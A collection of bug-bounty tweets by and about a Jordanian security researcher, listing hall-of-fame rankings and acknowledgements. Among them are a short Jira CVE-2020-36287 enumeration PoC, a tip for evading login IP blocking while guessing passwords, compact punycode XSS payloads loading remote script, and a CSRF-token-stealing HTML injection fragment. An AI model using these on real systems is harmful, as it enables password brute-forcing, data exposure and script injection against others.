أول أردني في قاعة الشهرة الخاصة بـGoogle الHall of Fame
قامت شركة @GoogleVRP بأدراج أسمي الى قاعة الشهرة الـHOFالمخصصة لمكتشفي الثغرات في برنامجهاBughunter programوحصلت على المركز "204" عالميا من أصل1300باحث امني، بثغره واحده فقط أصبحت في طليعة القائمة
https://t.co/meVB4gWTH8
جعفر أبو الندى هكر أردني
هاد الشب ال اردني بلغ عن 6 ثغرات أمنية في قوقل
وعلى اثرها تعاقد مع فيس بوك ولثلاث سنوات
كان بقائمة الشرف وبلغ عن 25 ثغرة في الفيس بوك
https://t.co/5nPHhl3hf5
@Jafar_Abo_Nada
يمكن لجميع متابعين قناة أب ديت الان الانتساب الى برنامج العضويات في القناة للحصول على المحتوى و المقابلات و الاستشارات الحصريه.
https://t.co/dH0EA86nlg
Thank god, I am proud to be [Ranked 5th] in the world among the #Top_10 security researchers in the month of [May/2021] on the [Bugcrowd Leaderboard]
Check out the @bugcrowd top 10: https://t.co/GRCesYoypc
MY BC Account:
https://t.co/U6VQMxIRin
#kickass#ItTakesACrowd
Rank 5th at🛡️[Atlassian bug bounty program]🛡️
Thanks god, Extremely happy and Proud to Announce that I have been listed at the #TOP_10 security researchers in the world on [@Atlassian Hall Of Fame]
MY BC Account: https://t.co/U6VQMxIRin
#BugBounty#bug
This is exploit bug that I discovered in jira
PoC CVE-2020-36287
Brute Force <GadgetId> start from 10000 to 19999
{BaseUrl}/rest/dashboards/1.0/10000/gadget/<GadgetId>/prefs
If server response 401 bug Fixed, If the server's response is 200, the response will contain XML data
We just disclosed this beautifully written report and proof of concept from @Jafar_Abo_Nada: https://t.co/YpGN6ATT95. Especially appreciated the additional feedback we got after mitigating the initial vulnerability. It’s worth reading!
Thanks god, Extremely happy and Proud to Announce that Listed on #TOP_10 at @Bugcrowd Leaderboard for the month of March/2020.
الحمد لله، بعد توفيق من الله وشهر مليء بالمنافسة، فخور بإدراجي ضمن ال Top_10 في [Bugcrowd Leaderboard] لشهر مارس
https://t.co/IH1BprIsH7
Thank God, I Got Acknowledgement by @Hacker0x01 After I discovered a bug in the integration process on H1 platform. The #bug found as a result of a mistake in authorizations configuration. which leads to the leakage of the JWT Token to unauthorized user
Big Thanks: @jobertabma
Thanks God, I got acknowledged by @Atlassian after discovering a security issue in a jira cloud. Bug type #SXSS This would allow a malicious app to bypass sandbox (as the XSS fires with-in the host app). and attacker can used this #bug with non-malicious apps as a #XSS vector.
Third bug in Twitter.
Tips
You are trying to guess the password on the login page, but the ip was blocked after several attempts
1bypass. Go to amazon, create account.
2From EC2 APIgateway get secret/access key
3In burp pro install ip rotate and past AWS key.
Run attack. enjoy.
#XSS Short payload 19char using #Punycode attack&without Space
xss vector using emoji punycode
<img/src=//🤣.io>
<iframe/src=//l❤️.io>
<script/src=//㎠.㎺>
It's auto translated to https://t.co/h3oFTZXucu by browsers
HTML injection to steal CSRF token/attack.
<img/src='//x.me